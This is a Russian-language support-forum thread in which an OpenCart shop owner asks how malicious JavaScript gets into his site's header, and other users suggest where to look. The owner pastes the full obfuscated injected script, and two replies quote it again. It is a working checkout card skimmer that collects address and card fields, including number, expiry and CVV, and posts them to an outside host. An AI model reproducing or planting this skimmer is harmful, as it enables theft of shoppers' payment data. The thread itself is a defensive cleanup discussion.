формирование хедера

[MrBa]

Доброго всем дня!

Обнаружил зловред JS. Устанавливается прямо в тег <head>. Перерыл весь сайт. Пытался найти в сорцах текст по шаблону - нет его. Не могу понять как он туда попадает. Я в ОС и вообще в программировании не силен. Подскажите плиз, где формируется хедер и как-откуда туда попадают JS. Буду рад любой помощи

[ardashev06]

шаблон header.tpl

контроллер header.php

 

какая версия opencart?

[MrBa]

версия 2.2.0.0

[ardashev06]

4 минуты назад, MrBa сказал:

версия 2.2.0.0

также проверьте эти файлы в кэше модификаторов /system/storage/modification

может с каким-то модулем принесли.

 

попробуйте открыть сайт с другого браузера(чистого, без установленных дополнений) 

Змінено 4 жовтня 2017 користувачем ardashev06

[MrBa]

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

[JIOPD]

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

[ardashev06]

20 минут назад, MrBa сказал:

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

покажите скрипт. скопируйте код сюда

а лучше - предоставьте ссылку на сайт

Змінено 4 жовтня 2017 користувачем ardashev06

[MrBa]

Только что, ardashev06 сказал:

покажите скрипт. скопируйте код сюда

предоставьте ссылку на сайт

http://www.fataliiseeds.net/

 

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

Только что, JIOPD сказал:

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

я же писал выше -

 

Только что, ardashev06 сказал:

искал прямо на сервере с помощью grep по шаблону.

 

[JIOPD]

14 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

[ardashev06]

15 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

 

предоставьте фтп в личку, посмотрю откуда ноги растут

[ardashev06]

1 минуту назад, JIOPD сказал:

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

а вы открывали его? там ничего особенного))

[MrBa]

Только что, ardashev06 сказал:

а вы открывали его? там ничего особенного))

тоже глянул, не нашел ничего касаемо вопроса.

[ardashev06]

3 минуты назад, MrBa сказал:

тоже глянул, не нашел ничего касаемо вопроса.

есть ли в header.tpl что-то между

 

<script src="catalog/view/javascript/jquery/owl-carousel/owl.carousel.min.js" type="text/javascript"></script>

 

{что-то здесь}

 

<link href='catalog/view/theme/default/stylesheet/jquery.growl.css' rel='stylesheet' type='text/css'>

[MrBa]

Только что, ardashev06 сказал:

есть ли в header.tpl что-то между

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

[ardashev06]

10 минут назад, MrBa сказал:

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

разумеется его вы там можете не увидеть.

 

но есть что-то между подключением скрипта и стиля? названия их выше.

 

если там вообще ничего нет,

 

то нужно смотреть установленные модификаторы

 

---

 

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

Змінено 4 жовтня 2017 користувачем ardashev06

[MrBa]

3 минуты назад, ardashev06 сказал:

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

вот и нет - он передает туда методом пост информацию. Но где он находится?

[ardashev06]

8 минут назад, MrBa сказал:

вот и нет - он передает туда методом пост информацию. Но где он находится?

методом пост на сайт пустышку

 

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

[MrBa]

Только что, ardashev06 сказал:

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

я его вычислил дебагером. Он туда шлет важные данные и вполне успешно, с возвратом - true

Те не менее спасибо за помощь. Буду искать где он хранится и как туда попадает